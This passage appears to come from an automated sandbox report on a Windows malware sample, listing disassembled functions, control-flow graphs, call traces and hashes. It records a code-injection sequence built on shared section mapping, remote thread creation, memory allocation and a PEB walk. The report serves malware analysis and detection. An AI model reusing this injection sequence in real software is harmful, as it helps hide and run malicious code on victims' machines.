                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                                                                                        Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                        Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                        Function 0075171B Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 444 75171b-751755 call 751a2e 447 751757-75178a VirtualAlloc call 7517a8 444->447 448 7517a3 444->448 450 75178f-7517a1 447->450 448->448 450->448
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0075176C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0073F000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_73f000_derhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction ID: 35c5b9b3f2a2ef9f07315d74e3fbe3e581bf782ef84bf22d70a5147eed904d3f
                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction Fuzzy Hash: FB113C79A00208EFDB01DF98C985E98BBF5EF08351F0580A4F9489B362D775EA90DF80
                                                                                                        Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.8%
                                                                                                        Dynamic/Decrypted Code Coverage:34.4%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:151
                                                                                                        Total number of Limit Nodes:6
                                                                                                        execution_graph 3407 4019c0 3408 4019c8 3407->3408 3409 4019e7 3407->3409 3410 401a29 Sleep 3409->3410 3411 4014fb 7 API calls 3410->3411 3412 401a44 3411->3412 3413 4015fb 7 API calls 3412->3413 3414 401a55 3412->3414 3413->3414 3351 402f42 3353 402f18 3351->3353 3352 4019e0 15 API calls 3354 40304f 3352->3354 3353->3352 3353->3354 3367 403103 3368 403246 3367->3368 3369 40312d 3367->3369 3369->3368 3370 4031f0 RtlCreateUserThread NtTerminateProcess 3369->3370 3370->3368 3259 401606 3259->3259 3260 401609 3259->3260 3261 4016af NtDuplicateObject 3260->3261 3270 4017cb 3260->3270 3262 4016cc NtCreateSection 3261->3262 3261->3270 3263 4016f2 NtMapViewOfSection 3262->3263 3264 40174c NtCreateSection 3262->3264 3263->3264 3265 401715 NtMapViewOfSection 3263->3265 3266 401778 3264->3266 3264->3270 3265->3264 3267 401733 3265->3267 3268 401782 NtMapViewOfSection 3266->3268 3266->3270 3267->3264 3269 4017a9 NtMapViewOfSection 3268->3269 3268->3270 3269->3270 3271 401613 3272 40161c 3271->3272 3273 4016af NtDuplicateObject 3272->3273 3282 4017cb 3272->3282 3274 4016cc NtCreateSection 3273->3274 3273->3282 3275 4016f2 NtMapViewOfSection 3274->3275 3276 40174c NtCreateSection 3274->3276 3275->3276 3277 401715 NtMapViewOfSection 3275->3277 3278 401778 3276->3278 3276->3282 3277->3276 3279 401733 3277->3279 3280 401782 NtMapViewOfSection 3278->3280 3278->3282 3279->3276 3281 4017a9 NtMapViewOfSection 3280->3281 3280->3282 3281->3282 3182 403257 3183 4031f0 RtlCreateUserThread NtTerminateProcess 3182->3183 3185 403261 3182->3185 3184 403246 3183->3184 3335 402ed9 3336 402e8d 3335->3336 3336->3335 3337 4019e0 15 API calls 3336->3337 3338 40304f 3336->3338 3337->3338 3290 5f0005 3295 5f092b GetPEB 3290->3295 3292 5f0030 3297 5f003c 3292->3297 3296 5f0972 3295->3296 3296->3292 3298 5f0049 3297->3298 3299 5f0e0f 2 API calls 3298->3299 3300 5f0223 3299->3300 3301 5f0d90 GetPEB 3300->3301 3302 5f0238 VirtualAlloc 3301->3302 3303 5f0265 3302->3303 3304 5f02ce VirtualProtect 3303->3304 3306 5f030b 3304->3306 3305 5f0439 VirtualFree 3309 5f04be LoadLibraryA 3305->3309 3306->3305 3308 5f08c7 3309->3308 3310 5f0001 3311 5f0005 3310->3311 3312 5f092b GetPEB 3311->3312 3313 5f0030 3312->3313 3314 5f003c 7 API calls 3313->3314 3315 5f0038 3314->3315 3163 5f003c 3164 5f0049 3163->3164 3176 5f0e0f SetErrorMode SetErrorMode 3164->3176 3169 5f0265 3170 5f02ce VirtualProtect 3169->3170 3172 5f030b 3170->3172 3171 5f0439 VirtualFree 3175 5f04be LoadLibraryA 3171->3175 3172->3171 3174 5f08c7 3175->3174 3177 5f0223 3176->3177 3178 5f0d90 3177->3178 3179 5f0dad 3178->3179 3180 5f0dbb GetPEB 3179->3180 3181 5f0238 VirtualAlloc 3179->3181 3180->3181 3181->3169 3186 76e85d 3187 76e86c 3186->3187 3190 76effd 3187->3190 3196 76f018 3190->3196 3191 76f021 CreateToolhelp32Snapshot 3192 76f03d Module32First 3191->3192 3191->3196 3193 76f04c 3192->3193 3195 76e875 3192->3195 3197 76ecbc 3193->3197 3196->3191 3196->3192 3198 76ece7 3197->3198 3199 76ed30 3198->3199 3200 76ecf8 VirtualAlloc 3198->3200 3199->3199 3200->3199 3415 4019eb 3416 4019f0 3415->3416 3417 401a29 Sleep 3416->3417 3418 4014fb 7 API calls 3417->3418 3419 401a44 3418->3419 3420 4015fb 7 API calls 3419->3420 3421 401a55 3419->3421 3420->3421 3248 76e84c 3249 76e85d 3248->3249 3250 76effd 3 API calls 3249->3250 3251 76e875 3250->3251 3339 4014fa 3340 40150c 3339->3340 3341 4015ea 3340->3341 3342 4016af NtDuplicateObject 3340->3342 3342->3341 3343 4016cc NtCreateSection 3342->3343 3344 4016f2 NtMapViewOfSection 3343->3344 3345 40174c NtCreateSection 3343->3345 3344->3345 3346 401715 NtMapViewOfSection 3344->3346 3345->3341 3347 401778 3345->3347 3346->3345 3348 401733 3346->3348 3347->3341 3349 401782 NtMapViewOfSection 3347->3349 3348->3345 3349->3341 3350 4017a9 NtMapViewOfSection 3349->3350 3350->3341 3201 402fbe 3202 402fc3 3201->3202 3203 40304f 3202->3203 3205 4019e0 3202->3205 3206 4019e7 3205->3206 3207 401a29 Sleep 3206->3207 3212 4014fb 3207->3212 3209 401a44 3211 401a55 3209->3211 3224 4015fb 3209->3224 3211->3203 3222 40150c 3212->3222 3213 4016af NtDuplicateObject 3214 4016cc NtCreateSection 3213->3214 3223 4015ea 3213->3223 3215 4016f2 NtMapViewOfSection 3214->3215 3216 40174c NtCreateSection 3214->3216 3215->3216 3217 401715 NtMapViewOfSection 3215->3217 3218 401778 3216->3218 3216->3223 3217->3216 3219 401733 3217->3219 3220 401782 NtMapViewOfSection 3218->3220 3218->3223 3219->3216 3221 4017a9 NtMapViewOfSection 3220->3221 3220->3223 3221->3223 3222->3213 3222->3223 3223->3209 3225 40160b 3224->3225 3226 4016af NtDuplicateObject 3225->3226 3228 4017cb 3225->3228 3227 4016cc NtCreateSection 3226->3227 3226->3228 3229 4016f2 NtMapViewOfSection 3227->3229 3230 40174c NtCreateSection 3227->3230 3228->3211 3229->3230 3231 401715 NtMapViewOfSection 3229->3231 3230->3228 3232 401778 3230->3232 3231->3230 3235 401733 3231->3235 3232->3228 3233 401782 NtMapViewOfSection 3232->3233 3233->3228 3234 4017a9 NtMapViewOfSection 3233->3234 3234->3228 3235->3230

                                                                                                        Executed Functions

                                                                                                        Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 4014fb-401504 86 40151b 85->86 87 40150c-40152e 85->87 86->87 92 401531-401545 call 40127e 87->92 97 40154a-401555 92->97 97->97 98 401558-40155a 97->98 99 40155d-401572 98->99 102 401574-401579 99->102 104 4015c4 102->104 105 40157b 102->105 108 4015c6 104->108 109 40162f-401632 104->109 106 4015f6-4015f8 105->106 107 40157d-40159a 105->107 117 40159d 107->117 118 40152f-401530 107->118 108->102 111 4015c8-4015cd 108->111 112 401634-401659 call 40127e 109->112 113 4016a5-4016a6 109->113 119 401648-401659 111->119 120 4015cf-4015d0 111->120 121 40165b 112->121 122 40165e-401663 112->122 115 4016a7-4016a9 113->115 116 40162d 113->116 126 401987 115->126 127 4016af-4016c6 NtDuplicateObject 115->127 116->109 117->99 128 40159f-4015a1 117->128 118->92 119->121 119->122 123 4015d2-4015e8 120->123 124 4015b6-4015b9 120->124 121->122 148 401989-401991 122->148 149 401669-40167a 122->149 129 4015ea-4015f5 123->129 130 40157c 123->130 124->112 136 4015bb-4015c3 124->136 135 401996-4019dd call 40127e 126->135 127->126 131 4016cc-4016f0 NtCreateSection 127->131 133 4015a3 128->133 134 40161c 128->134 129->106 130->107 137 4015a9-4015b4 130->137 138 4016f2-401713 NtMapViewOfSection 131->138 139 40174c-401772 NtCreateSection 131->139 141 40161e-40162c 133->141 142 4015a5-4015a6 133->142 134->141 136->104 137->124 138->139 145 401715-401731 NtMapViewOfSection 138->145 139->126 147 401778-40177c 139->147 141->112 154 401643 141->154 142->137 145->139 151 401733-401749 145->151 147->126 152 401782-4017a3 NtMapViewOfSection 147->152 148->122 148->135 149->126 161 401680-4016a3 149->161 151->139 152->126 156 4017a9-4017c5 NtMapViewOfSection 152->156 154->112 156->126 160 4017cb call 4017d0 156->160 161->115
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                        • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                        • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                        • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A
                                                                                                        Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 171 4015fb-401604 172 401615 171->172 173 40160b-401611 171->173 172->173 174 401618-40162c 172->174 173->174 178 401643 174->178 179 401634-401659 call 40127e 174->179 178->179 184 40165b 179->184 185 40165e-401663 179->185 184->185 187 401989-401991 185->187 188 401669-40167a 185->188 187->185 191 401996-4019dd call 40127e 187->191 192 401680-4016a9 188->192 193 401987 188->193 192->193 200 4016af-4016c6 NtDuplicateObject 192->200 193->191 200->193 202 4016cc-4016f0 NtCreateSection 200->202 205 4016f2-401713 NtMapViewOfSection 202->205 206 40174c-401772 NtCreateSection 202->206 205->206 208 401715-401731 NtMapViewOfSection 205->208 206->193 209 401778-40177c 206->209 208->206 211 401733-401749 208->211 209->193 212 401782-4017a3 NtMapViewOfSection 209->212 211->206 212->193 214 4017a9-4017c5 NtMapViewOfSection 212->214 214->193 217 4017cb call 4017d0 214->217
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                        • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                                                        • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                        • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64
                                                                                                        Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 219 401613-40162c 223 401643 219->223 224 401634-401659 call 40127e 219->224 223->224 229 40165b 224->229 230 40165e-401663 224->230 229->230 232 401989-401991 230->232 233 401669-40167a 230->233 232->230 236 401996-4019dd call 40127e 232->236 237 401680-4016a9 233->237 238 401987 233->238 237->238 245 4016af-4016c6 NtDuplicateObject 237->245 238->236 245->238 247 4016cc-4016f0 NtCreateSection 245->247 250 4016f2-401713 NtMapViewOfSection 247->250 251 40174c-401772 NtCreateSection 247->251 250->251 253 401715-401731 NtMapViewOfSection 250->253 251->238 254 401778-40177c 251->254 253->251 256 401733-401749 253->256 254->238 257 401782-4017a3 NtMapViewOfSection 254->257 256->251 257->238 259 4017a9-4017c5 NtMapViewOfSection 257->259 259->238 262 4017cb call 4017d0 259->262
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                        • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                                                        • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                        • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64
                                                                                                        Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 264 401606-401607 264->264 265 401609 264->265 266 40160b-40162c 265->266 267 40163c-401659 call 40127e 265->267 277 401643 266->277 278 401634-401639 266->278 274 40165b 267->274 275 40165e-401663 267->275 274->275 280 401989-401991 275->280 281 401669-40167a 275->281 277->278 278->267 280->275 284 401996-4019dd call 40127e 280->284 285 401680-4016a9 281->285 286 401987 281->286 285->286 293 4016af-4016c6 NtDuplicateObject 285->293 286->284 293->286 295 4016cc-4016f0 NtCreateSection 293->295 298 4016f2-401713 NtMapViewOfSection 295->298 299 40174c-401772 NtCreateSection 295->299 298->299 301 401715-401731 NtMapViewOfSection 298->301 299->286 302 401778-40177c 299->302 301->299 304 401733-401749 301->304 302->286 305 401782-4017a3 NtMapViewOfSection 302->305 304->299 305->286 307 4017a9-4017c5 NtMapViewOfSection 305->307 307->286 310 4017cb call 4017d0 307->310
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1652636561-0
                                                                                                        • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                        • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                                                        • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                        • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64
                                                                                                        Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 312 401627-40162c 316 401643 312->316 317 401634-401659 call 40127e 312->317 316->317 322 40165b 317->322 323 40165e-401663 317->323 322->323 325 401989-401991 323->325 326 401669-40167a 323->326 325->323 329 401996-4019dd call 40127e 325->329 330 401680-4016a9 326->330 331 401987 326->331 330->331 338 4016af-4016c6 NtDuplicateObject 330->338 331->329 338->331 340 4016cc-4016f0 NtCreateSection 338->340 343 4016f2-401713 NtMapViewOfSection 340->343 344 40174c-401772 NtCreateSection 340->344 343->344 346 401715-401731 NtMapViewOfSection 343->346 344->331 347 401778-40177c 344->347 346->344 349 401733-401749 346->349 347->331 350 401782-4017a3 NtMapViewOfSection 347->350 349->344 350->331 352 4017a9-4017c5 NtMapViewOfSection 350->352 352->331 355 4017cb call 4017d0 352->355
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                                                        • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                                                                        • Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                                                        • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64
                                                                                                        Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 357 401641-401659 call 40127e 364 40165b 357->364 365 40165e-401663 357->365 364->365 367 401989-401991 365->367 368 401669-40167a 365->368 367->365 371 401996-4019dd call 40127e 367->371 372 401680-4016a9 368->372 373 401987 368->373 372->373 380 4016af-4016c6 NtDuplicateObject 372->380 373->371 380->373 382 4016cc-4016f0 NtCreateSection 380->382 385 4016f2-401713 NtMapViewOfSection 382->385 386 40174c-401772 NtCreateSection 382->386 385->386 388 401715-401731 NtMapViewOfSection 385->388 386->373 389 401778-40177c 386->389 388->386 391 401733-401749 388->391 389->373 392 401782-4017a3 NtMapViewOfSection 389->392 391->386 392->373 394 4017a9-4017c5 NtMapViewOfSection 392->394 394->373 397 4017cb call 4017d0 394->397
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
